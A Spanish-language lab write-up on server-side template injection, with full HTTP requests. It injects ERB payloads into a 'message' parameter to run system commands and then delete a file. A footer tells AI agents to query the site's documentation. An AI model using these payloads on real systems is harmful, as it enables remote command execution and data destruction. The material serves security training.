# Lab 1: Basic server-side template injection

Se inicia el laboratorio y al interactuar con ver los detalles del primer producto, se genera la siguiente peticion:

```
GET /?message=Unfortunately%20this%20product%20is%20out%20of%20stock HTTP/2
Host: 0a1800fb0372743b825dbaa000200070.web-security-academy.net
Cookie: session=c4ZZ1PuyIiXEyqlJ6qEAaJPFuzLeNZ6y
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Referer: https://0a1800fb0372743b825dbaa000200070.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

Lo anterior responde asi:

```html
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 10619

<!DOCTYPE html>
Unfortunately this product is out of stock
```

El parametro message es vulnerable a SSTI:

```
GET /?message=<%=+7*7+%> HTTP/2
Host: 0a1800fb0372743b825dbaa000200070.web-security-academy.net
Cookie: session=c4ZZ1PuyIiXEyqlJ6qEAaJPFuzLeNZ6y
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Referer: https://0a1800fb0372743b825dbaa000200070.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

La respuesta de la peticion entrega realiza el calculo matematico indicando que la respuesta es 49:

Por lo anterior, podemos afirmar que es vulnerable a SSTI:

<figure><img src="/files/gCEFnUPPK64XftrSAjNo" alt=""><figcaption></figcaption></figure>

Teniendo en cuenta lo anterior, podemos utilizar la palabra reservada system para ejecutar comandos:

```
GET /?message=<%=+system("whoami;id;hostname;ip+a+show")+%> HTTP/2
Host: 0a1800fb0372743b825dbaa000200070.web-security-academy.net
Cookie: session=c4ZZ1PuyIiXEyqlJ6qEAaJPFuzLeNZ6y
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Referer: https://0a1800fb0372743b825dbaa000200070.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

Lo anterior da como resultado:

<figure><img src="/files/eB9dI4ATfVhJFhNIEvkW" alt=""><figcaption></figcaption></figure>

Para resolver el laboratorio enviamos la siguiente peticion:

```
GET /?message=<%=+system("rm+/home/carlos/morale.txt")+%> HTTP/2
Host: 0a1800fb0372743b825dbaa000200070.web-security-academy.net
Cookie: session=c4ZZ1PuyIiXEyqlJ6qEAaJPFuzLeNZ6y
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Referer: https://0a1800fb0372743b825dbaa000200070.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/web/server-side-template-injection/lab-1-basic-server-side-template-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.